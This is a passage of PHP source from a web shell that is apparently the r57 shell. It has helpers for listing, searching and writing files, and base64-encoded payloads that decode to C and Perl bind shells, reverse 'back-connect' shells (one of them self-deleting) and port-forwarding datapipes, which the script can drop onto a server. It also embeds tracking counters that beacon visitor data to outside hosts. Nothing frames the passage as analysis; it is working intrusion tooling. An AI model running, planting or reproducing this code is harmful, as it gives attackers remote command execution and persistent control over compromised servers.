mail','Mail sent'); echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#3A6EA5><font color=orange face=Verdana size=-2><div align=center><b>". $text[$l][$n]."</b></div></font></td></tr></table>"; return null; } function perms($mode) { if ($GLOBALS['windows']) return 0; if( $mode & 0x1000 ) { $type='p'; } else if( $mode & 0x2000 ) { $type='c'; } else if( $mode & 0x4000 ) { $type='d'; } else if( $mode & 0x6000 ) { $type='b'; } else if( $mode & 0x8000 ) { $type='-'; } else if( $mode & 0xA000 ) { $type='l'; } else if( $mode & 0xC000 ) { $type='s'; } else $type='u'; $owner["read"] = ($mode & 00400) ? 'r' : '-'; $owner["write"] = ($mode & 00200) ? 'w' : '-'; $owner["execute"] = ($mode & 00100) ? 'x' : '-'; $group["read"] = ($mode & 00040) ? 'r' : '-'; $group["write"] = ($mode & 00020) ? 'w' : '-'; $group["execute"] = ($mode & 00010) ? 'x' : '-'; $world["read"] = ($mode & 00004) ? 'r' : '-'; $world["write"] = ($mode & 00002) ? 'w' : '-'; $world["execute"] = ($mode & 00001) ? 'x' : '-'; if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S'; if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S'; if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T'; $s=sprintf("%1s", $type); $s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']); $s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']); $s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']);
  • 24. return trim($s); } function in($type,$name,$size,$value) { $ret = "<input type=".$type." name=".$name." "; if($size != 0) { $ret .= "size=".$size." "; } $ret .= "value="".$value."">"; return $ret; } function which($pr) { $path = ex("which $pr"); if(!empty($path)) { return $path; } else { return $pr; } } function cf($fname,$text) { $w_file=@fopen($fname,"w") or we($fname); if($w_file) { @fputs($w_file,@base64_decode($text)); @fclose($w_file); } } function sr($l,$t1,$t2) { return "<tr class=tr1><td class=td1 width=".$l."% align=right>".$t1."</td><td class=td1 align=left>".$t2."</td></tr>"; } if (!@function_exists("view_size")) { function view_size($size) { if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";} elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";} elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";} else {$size = $size . " B";} return $size; } } function DirFilesR($dir,$types='') { $files = Array(); if(($handle = @opendir($dir))) { while (false !== ($file = @readdir($handle))) { if ($file != "." && $file != "..") { if(@is_dir($dir."/".$file)) $files = @array_merge($files,DirFilesR($dir."/".$file,$types)); else { $pos = @strrpos($file,"."); $ext = @substr($file,$pos,@strlen($file)-$pos); if($types) { if(@in_array($ext,explode(';',$types))) $files[] = $dir."/".$file; }
  • 25. else $files[] = $dir."/".$file; } } } @closedir($handle); } return $files; } class SearchResult { var $text; var $FilesToSearch; var $ResultFiles; var $FilesTotal; var $MatchesCount; var $FileMatschesCount; var $TimeStart; var $TimeTotal; var $titles; function SearchResult($dir,$text,$filter='') { $dirs = @explode(";",$dir); $this->FilesToSearch = Array(); for($a=0;$a<count($dirs);$a++) $this->FilesToSearch = @array_merge($this- >FilesToSearch,DirFilesR($dirs[$a],$filter)); $this->text = $text; $this->FilesTotal = @count($this->FilesToSearch); $this->TimeStart = getmicrotime(); $this->MatchesCount = 0; $this->ResultFiles = Array(); $this->FileMatchesCount = Array(); $this->titles = Array(); } function GetFilesTotal() { return $this->FilesTotal; } function GetTitles() { return $this->titles; } function GetTimeTotal() { return $this->TimeTotal; } function GetMatchesCount() { return $this->MatchesCount; } function GetFileMatchesCount() { return $this->FileMatchesCount; } function GetResultFiles() { return $this->ResultFiles; } function SearchText($phrase=0,$case=0) { $qq = @explode(' ',$this->text); $delim = '|'; if($phrase) foreach($qq as $k=>$v) $qq[$k] = 'b'.$v.'b'; $words = '('.@implode($delim,$qq).')'; $pattern = "/".$words."/"; if(!$case) $pattern .= 'i'; foreach($this->FilesToSearch as $k=>$filename) { $this->FileMatchesCount[$filename] = 0; $FileStrings = @file($filename) or @next; for($a=0;$a<@count($FileStrings);$a++) { $count = 0; $CurString = $FileStrings[$a];
  • 26. $CurString = @Trim($CurString); $CurString = @strip_tags($CurString); $aa = ''; if(($count = @preg_match_all($pattern,$CurString,$aa))) { $CurString = @preg_replace($pattern,"<SPAN style='color: #990000;'><b>1</b></SPAN>",$CurString); $this->ResultFiles[$filename][$a+1] = $CurString; $this->MatchesCount += $count; $this->FileMatchesCount[$filename] += $count; } } } $this->TimeTotal = @round(getmicrotime() - $this->TimeStart,4); } } function getmicrotime() { list($usec,$sec) = @explode(" ",@microtime()); return ((float)$usec + (float)$sec); } $port_bind_bd_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZS A8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0Ka W50IG1haW4oYXJnYyxhcmd2KQ0KaW50I GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsN CiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1 vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9 pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIH NvY2tmZCA9IHNvY2tldChBRl9JTkVULF NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb 2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdm ZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml 0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk 7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1Zi kpDQogICBzeXN0ZW0oImVjaG8gd2VsY2 9tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyc iwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld 2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50 IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQp pZihlbnRlcmVkW2ldID09ICdccicpDQp lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn 0="; $port_bind_bd_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR 1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3Rj cCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2N rb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaW UgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT 05OLFMpOw0KaWYoISgkcGlkPWZvcmspK Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05O IjsNCm9wZW4gU1RET1VULCI+JkNPTk4i
  • 27. Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCB leGVjdXRlICRTSEVMTFxuIjsNCmNsb3N lIENPTk47DQpleGl0IDA7DQp9DQp9"; $back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3Rl bT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVls xXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZH IpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX 1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7 DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3R lbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; $back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2 x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pb iBzaW47DQogY2hhciBybXNbMjFdPSJyb SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9w b3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndls xXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1 ApIDsgDQogaWYgKChjb25uZWN0KGZkLC Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgc GVycm9yKCJbLV0gY29ubmVjdCgpIik7D QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1 cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk 7IA0KfQ=="; $datapipe_c="I2luY2x1ZGUgPHN5cy90eXBlcy5oPg0KI2luY2x1ZGUgPHN5cy9zb2NrZXQuaD4NCiNpbm NsdWRlIDxzeXMvd2FpdC5oPg0KI2luY2 x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxzdGRpby5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KI 2luY2x1ZGUgPGVycm5vLmg+DQojaW5jb HVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxsaW51eC90aW1lLmg+DQoj aWZkZWYgU1RSRVJST1INCmV4dGVybiBj aGFyICpzeXNfZXJybGlzdFtdOw0KZXh0ZXJuIGludCBzeXNfbmVycjsNCmNoYXIgKnVuZGVmID0gIlVuZGV maW5lZCBlcnJvciI7DQpjaGFyICpzdHJ lcnJvcihlcnJvcikgIA0KaW50IGVycm9yOyAgDQp7IA0KaWYgKGVycm9yID4gc3lzX25lcnIpDQpyZXR1cm 4gdW5kZWY7DQpyZXR1cm4gc3lzX2Vycm xpc3RbZXJyb3JdOw0KfQ0KI2VuZGlmDQoNCm1haW4oYXJnYywgYXJndikgIA0KICBpbnQgYXJnYzsgIA0KI CBjaGFyICoqYXJndjsgIA0KeyANCiAga W50IGxzb2NrLCBjc29jaywgb3NvY2s7DQogIEZJTEUgKmNmaWxlOw0KICBjaGFyIGJ1Zls0MDk2XTsNCiAg c3RydWN0IHNvY2thZGRyX2luIGxhZGRy LCBjYWRkciwgb2FkZHI7DQogIGludCBjYWRkcmxlbiA9IHNpemVvZihjYWRkcik7DQogIGZkX3NldCBmZHN yLCBmZHNlOw0KICBzdHJ1Y3QgaG9zdGV udCAqaDsNCiAgc3RydWN0IHNlcnZlbnQgKnM7DQogIGludCBuYnl0Ow0KICB1bnNpZ25lZCBsb25nIGE7DQ ogIHVuc2lnbmVkIHNob3J0IG9wb3J0Ow 0KDQogIGlmIChhcmdjICE9IDQpIHsNCiAgICBmcHJpbnRmKHN0ZGVyciwiVXNhZ2U6ICVzIGxvY2FscG9yd CByZW1vdGVwb3J0IHJlbW90ZWhvc3Rcb iIsYXJndlswXSk7DQogICAgcmV0dXJuIDMwOw0KICB9DQogIGEgPSBpbmV0X2FkZHIoYXJndlszXSk7DQog IGlmICghKGggPSBnZXRob3N0YnluYW1l KGFyZ3ZbM10pKSAmJg0KICAgICAgIShoID0gZ2V0aG9zdGJ5YWRkcigmYSwgNCwgQUZfSU5FVCkpKSB7DQo gICAgcGVycm9yKGFyZ3ZbM10pOw0KICA gIHJldHVybiAyNTsNCiAgfQ0KICBvcG9ydCA9IGF0b2woYXJndlsyXSk7DQogIGxhZGRyLnNpbl9wb3J0ID 0gaHRvbnMoKHVuc2lnbmVkIHNob3J0KS hhdG9sKGFyZ3ZbMV0pKSk7DQogIGlmICgobHNvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sI
  • 28. ElQUFJPVE9fVENQKSkgPT0gLTEpIHsNC iAgICBwZXJyb3IoInNvY2tldCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBsYWRkci5zaW5fZmFtaWx5 ID0gaHRvbnMoQUZfSU5FVCk7DQogIGxh ZGRyLnNpbl9hZGRyLnNfYWRkciA9IGh0b25sKDApOw0KICBpZiAoYmluZChsc29jaywgJmxhZGRyLCBzaXp lb2YobGFkZHIpKSkgew0KICAgIHBlcnJ vcigiYmluZCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBpZiAobGlzdGVuKGxzb2NrLCAxKSkgew0KIC AgIHBlcnJvcigibGlzdGVuIik7DQogIC AgcmV0dXJuIDIwOw0KICB9DQogIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0gLTEpIHsNCiAgICBwZXJyb3IoI mZvcmsiKTsNCiAgICByZXR1cm4gMjA7D QogIH0NCiAgaWYgKG5ieXQgPiAwKQ0KICAgIHJldHVybiAwOw0KICBzZXRzaWQoKTsNCiAgd2hpbGUgKChj c29jayA9IGFjY2VwdChsc29jaywgJmNh ZGRyLCAmY2FkZHJsZW4pKSAhPSAtMSkgew0KICAgIGNmaWxlID0gZmRvcGVuKGNzb2NrLCJyKyIpOw0KICA gIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0 gLTEpIHsNCiAgICAgIGZwcmludGYoY2ZpbGUsICI1MDAgZm9yazogJXNcbiIsIHN0cmVycm9yKGVycm5vKS k7DQogICAgICBzaHV0ZG93bihjc29jay wyKTsNCiAgICAgIGZjbG9zZShjZmlsZSk7DQogICAgICBjb250aW51ZTsNCiAgICB9DQogICAgaWYgKG5ie XQgPT0gMCkNCiAgICAgIGdvdG8gZ290c 29jazsNCiAgICBmY2xvc2UoY2ZpbGUpOw0KICAgIHdoaWxlICh3YWl0cGlkKC0xLCBOVUxMLCBXTk9IQU5H KSA+IDApOw0KICB9DQogIHJldHVybiAy MDsNCg0KIGdvdHNvY2s6DQogIGlmICgob3NvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIEl QUFJPVE9fVENQKSkgPT0gLTEpIHsNCiA gICBmcHJpbnRmKGNmaWxlLCAiNTAwIHNvY2tldDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ2 90byBxdWl0MTsNCiAgfQ0KICBvYWRkci 5zaW5fZmFtaWx5ID0gaC0+aF9hZGRydHlwZTsNCiAgb2FkZHIuc2luX3BvcnQgPSBodG9ucyhvcG9ydCk7D QogIG1lbWNweSgmb2FkZHIuc2luX2FkZ HIsIGgtPmhfYWRkciwgaC0+aF9sZW5ndGgpOw0KICBpZiAoY29ubmVjdChvc29jaywgJm9hZGRyLCBzaXpl b2Yob2FkZHIpKSkgew0KICAgIGZwcmlu dGYoY2ZpbGUsICI1MDAgY29ubmVjdDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl 0MTsNCiAgfQ0KICB3aGlsZSAoMSkgew0 KICAgIEZEX1pFUk8oJmZkc3IpOw0KICAgIEZEX1pFUk8oJmZkc2UpOw0KICAgIEZEX1NFVChjc29jaywmZm Rzcik7DQogICAgRkRfU0VUKGNzb2NrLC ZmZHNlKTsNCiAgICBGRF9TRVQob3NvY2ssJmZkc3IpOw0KICAgIEZEX1NFVChvc29jaywmZmRzZSk7DQogI CAgaWYgKHNlbGVjdCgyMCwgJmZkc3IsI E5VTEwsICZmZHNlLCBOVUxMKSA9PSAtMSkgew0KICAgICAgZnByaW50ZihjZmlsZSwgIjUwMCBzZWxlY3Q6 ICVzXG4iLCBzdHJlcnJvcihlcnJubykp Ow0KICAgICAgZ290byBxdWl0MjsNCiAgICB9DQogICAgaWYgKEZEX0lTU0VUKGNzb2NrLCZmZHNyKSB8fCB GRF9JU1NFVChjc29jaywmZmRzZSkpIHs NCiAgICAgIGlmICgobmJ5dCA9IHJlYWQoY3NvY2ssYnVmLDQwOTYpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQ ogICAgICBpZiAoKHdyaXRlKG9zb2NrLG J1ZixuYnl0KSkgPD0gMCkNCglnb3RvIHF1aXQyOw0KICAgIH0gZWxzZSBpZiAoRkRfSVNTRVQob3NvY2ssJ mZkc3IpIHx8IEZEX0lTU0VUKG9zb2NrL CZmZHNlKSkgew0KICAgICAgaWYgKChuYnl0ID0gcmVhZChvc29jayxidWYsNDA5NikpIDw9IDApDQoJZ290 byBxdWl0MjsNCiAgICAgIGlmICgod3Jp dGUoY3NvY2ssYnVmLG5ieXQpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgfQ0KICB9DQoNCiBxdWl0Mjo NCiAgc2h1dGRvd24ob3NvY2ssMik7DQo gIGNsb3NlKG9zb2NrKTsNCiBxdWl0MToNCiAgZmZsdXNoKGNmaWxlKTsNCiAgc2h1dGRvd24oY3NvY2ssMi k7DQogcXVpdDA6DQogIGZjbG9zZShjZm lsZSk7DQogIHJldHVybiAwOw0KfQ=="; $datapipe_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgSU86OlNvY2tldDsNCnVzZSBQT1NJWDsNCiRsb2Nhb HBvcnQgPSAkQVJHVlswXTsNCiRob3N0I CAgICAgPSAkQVJHVlsxXTsNCiRwb3J0ICAgICAgPSAkQVJHVlsyXTsNCiRkYWVtb249MTsNCiRESVIgPSB1 bmRlZjsNCiR8ID0gMTsNCmlmICgkZGFl bW9uKXsgJHBpZCA9IGZvcms7IGV4aXQgaWYgJHBpZDsgZGllICIkISIgdW5sZXNzIGRlZmluZWQoJHBpZCk 7IFBPU0lYOjpzZXRzaWQoKSBvciBkaWU gIiQhIjsgfQ0KJW8gPSAoJ3BvcnQnID0+ICRsb2NhbHBvcnQsJ3RvcG9ydCcgPT4gJHBvcnQsJ3RvaG9zdC cgPT4gJGhvc3QpOw0KJGFoID0gSU86Ol NvY2tldDo6SU5FVC0+bmV3KCdMb2NhbFBvcnQnID0+ICRsb2NhbHBvcnQsJ1JldXNlJyA9PiAxLCdMaXN0Z W4nID0+IDEwKSB8fCBkaWUgIiQhIjsNC iRTSUd7J0NITEQnfSA9ICdJR05PUkUnOw0KJG51bSA9IDA7DQp3aGlsZSAoMSkgeyANCiRjaCA9ICRhaC0+
  • 29. YWNjZXB0KCk7IGlmICghJGNoKSB7IHBy aW50IFNUREVSUiAiJCFcbiI7IG5leHQ7IH0NCisrJG51bTsNCiRwaWQgPSBmb3JrKCk7DQppZiAoIWRlZml uZWQoJHBpZCkpIHsgcHJpbnQgU1RERVJ SICIkIVxuIjsgfSANCmVsc2lmICgkcGlkID09IDApIHsgJGFoLT5jbG9zZSgpOyBSdW4oXCVvLCAkY2gsIC RudW0pOyB9IA0KZWxzZSB7ICRjaC0+Y2 xvc2UoKTsgfQ0KfQ0Kc3ViIFJ1biB7DQpteSgkbywgJGNoLCAkbnVtKSA9IEBfOw0KbXkgJHRoID0gSU86O lNvY2tldDo6SU5FVC0+bmV3KCdQZWVyQ WRkcicgPT4gJG8tPnsndG9ob3N0J30sJ1BlZXJQb3J0JyA9PiAkby0+eyd0b3BvcnQnfSk7DQppZiAoISR0 aCkgeyBleGl0IDA7IH0NCm15ICRmaDsN CmlmICgkby0+eydkaXInfSkgeyAkZmggPSBTeW1ib2w6OmdlbnN5bSgpOyBvcGVuKCRmaCwgIj4kby0+eyd kaXInfS90dW5uZWwkbnVtLmxvZyIpIG9 yIGRpZSAiJCEiOyB9DQokY2gtPmF1dG9mbHVzaCgpOw0KJHRoLT5hdXRvZmx1c2goKTsNCndoaWxlICgkY2 ggfHwgJHRoKSB7DQpteSAkcmluID0gIi I7DQp2ZWMoJHJpbiwgZmlsZW5vKCRjaCksIDEpID0gMSBpZiAkY2g7DQp2ZWMoJHJpbiwgZmlsZW5vKCR0a CksIDEpID0gMSBpZiAkdGg7DQpteSgkc m91dCwgJGVvdXQpOw0Kc2VsZWN0KCRyb3V0ID0gJHJpbiwgdW5kZWYsICRlb3V0ID0gJHJpbiwgMTIwKTsN CmlmICghJHJvdXQgICYmICAhJGVvdXQp IHt9DQpteSAkY2J1ZmZlciA9ICIiOw0KbXkgJHRidWZmZXIgPSAiIjsNCmlmICgkY2ggJiYgKHZlYygkZW9 1dCwgZmlsZW5vKCRjaCksIDEpIHx8IHZ lYygkcm91dCwgZmlsZW5vKCRjaCksIDEpKSkgew0KbXkgJHJlc3VsdCA9IHN5c3JlYWQoJGNoLCAkdGJ1Zm ZlciwgMTAyNCk7DQppZiAoIWRlZmluZW QoJHJlc3VsdCkpIHsNCnByaW50IFNUREVSUiAiJCFcbiI7DQpleGl0IDA7DQp9DQppZiAoJHJlc3VsdCA9P SAwKSB7IGV4aXQgMDsgfQ0KfQ0KaWYgK CR0aCAgJiYgICh2ZWMoJGVvdXQsIGZpbGVubygkdGgpLCAxKSAgfHwgdmVjKCRyb3V0LCBmaWxlbm8oJHRo KSwgMSkpKSB7DQpteSAkcmVzdWx0ID0g c3lzcmVhZCgkdGgsICRjYnVmZmVyLCAxMDI0KTsNCmlmICghZGVmaW5lZCgkcmVzdWx0KSkgeyBwcmludCB TVERFUlIgIiQhXG4iOyBleGl0IDA7IH0 NCmlmICgkcmVzdWx0ID09IDApIHtleGl0IDA7fQ0KfQ0KaWYgKCRmaCAgJiYgICR0YnVmZmVyKSB7KHByaW 50ICRmaCAkdGJ1ZmZlcik7fQ0Kd2hpbG UgKG15ICRsZW4gPSBsZW5ndGgoJHRidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJHRoLCAkdGJ1Z mZlciwgJGxlbik7DQppZiAoJHJlcyA+I DApIHskdGJ1ZmZlciA9IHN1YnN0cigkdGJ1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAi JCFcbiI7fQ0KfQ0Kd2hpbGUgKG15ICRs ZW4gPSBsZW5ndGgoJGNidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJGNoLCAkY2J1ZmZlciwgJGx lbik7DQppZiAoJHJlcyA+IDApIHskY2J 1ZmZlciA9IHN1YnN0cigkY2J1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ 0KfX19DQo="; $c1 = "PHNjcmlwdCBsYW5ndWFnZT0iamF2YXNjcmlwdCI+aG90bG9nX2pzPSIxLjAiO2hvdGxvZ19yPSIiK01hdG gucmFuZG9tKCkrIiZzPTgxNjA2 JmltPTEmcj0iK2VzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrIiZwZz0iK2VzY2FwZSh3aW5kb3cubG9jYXR pb24uaHJlZik7ZG9jdW1lbnQuY29va2l lPSJob3Rsb2c9MTsgcGF0aD0vIjsgaG90bG9nX3IrPSImYz0iKyhkb2N1bWVudC5jb29raWU/IlkiOiJOIi k7PC9zY3JpcHQ+PHNjcmlwdCBsYW5ndW FnZT0iamF2YXNjcmlwdDEuMSI+aG90bG9nX2pzPSIxLjEiO2hvdGxvZ19yKz0iJmo9IisobmF2aWdhdG9yL mphdmFFbmFibGVkKCk/IlkiOiJOIik8L 3NjcmlwdD48c2NyaXB0IGxhbmd1YWdlPSJqYXZhc2NyaXB0MS4yIj5ob3Rsb2dfanM9IjEuMiI7aG90bG9n X3IrPSImd2g9IitzY3JlZW4ud2lkdGgr J3gnK3NjcmVlbi5oZWlnaHQrIiZweD0iKygoKG5hdmlnYXRvci5hcHBOYW1lLnN1YnN0cmluZygwLDMpPT0 iTWljIikpP3NjcmVlbi5jb2xvckRlcHR oOnNjcmVlbi5waXhlbERlcHRoKTwvc2NyaXB0PjxzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQxLjMiPm hvdGxvZ19qcz0iMS4zIjwvc2NyaXB0Pj xzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQiPmhvdGxvZ19yKz0iJmpzPSIraG90bG9nX2pzO2RvY3VtZ W50LndyaXRlKCI8YSBocmVmPSdodHRwO i8vY2xpY2suaG90bG9nLnJ1Lz84MTYwNicgdGFyZ2V0PSdfdG9wJz48aW1nICIrIiBzcmM9J2h0dHA6Ly9o aXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2hv dGxvZy9jb3VudD8iK2hvdGxvZ19yKyImJyBib3JkZXI9MCB3aWR0aD0xIGhlaWdodD0xIGFsdD0xPjwvYT4 iKTwvc2NyaXB0Pjxub3NjcmlwdD48YSB ocmVmPWh0dHA6Ly9jbGljay5ob3Rsb2cucnUvPzgxNjA2IHRhcmdldD1fdG9wPjxpbWdzcmM9Imh0dHA6Ly
  • 30. 9oaXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2 hvdGxvZy9jb3VudD9zPTgxNjA2JmltPTEiIGJvcmRlcj0wd2lkdGg9IjEiIGhlaWdodD0iMSIgYWx0PSJIb 3RMb2ciPjwvYT48L25vc2NyaXB0Pg=="; $c2 = "PCEtLUxpdmVJbnRlcm5ldCBjb3VudGVyLS0+PHNjcmlwdCBsYW5ndWFnZT0iSmF2YVNjcmlwdCI+PCEtLQ 0KZG9jdW1lbnQud3JpdGUoJzxh IGhyZWY9Imh0dHA6Ly93d3cubGl2ZWludGVybmV0LnJ1L2NsaWNrIiAnKw0KJ3RhcmdldD1fYmxhbms+PGl tZyBzcmM9Imh0dHA6Ly9jb3VudGVyLnl hZHJvLnJ1L2hpdD90NTIuNjtyJysNCmVzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrKCh0eXBlb2Yoc2NyZW VuKT09J3VuZGVmaW5lZCcpPycnOg0KJz tzJytzY3JlZW4ud2lkdGgrJyonK3NjcmVlbi5oZWlnaHQrJyonKyhzY3JlZW4uY29sb3JEZXB0aD8NCnNjc mVlbi5jb2xvckRlcHRoOnNjcmVlbi5wa XhlbERlcHRoKSkrJzsnK01hdGgucmFuZG9tKCkrDQonIiBhbHQ9ImxpdmVpbnRlcm5ldC5ydTog7+7q4Ofg 7e4g9+jx6+4g7/Du8ezu8vDu4iDoIO/u 8eXy6PLl6+XpIOfgIDI0IPfg8eAiICcrDQonYm9yZGVyPTAgd2lkdGg9MCBoZWlnaHQ9MD48L2E+JykvLy0 tPjwvc2NyaXB0PjwhLS0vTGl2ZUludGV ybmV0LS0+"; echo $head; echo '</head>'; if(empty($_POST['cmd'])) { $serv = array(127,192,172,10); $addr=@explode('.', $_SERVER['SERVER_ADDR']); $current_version = 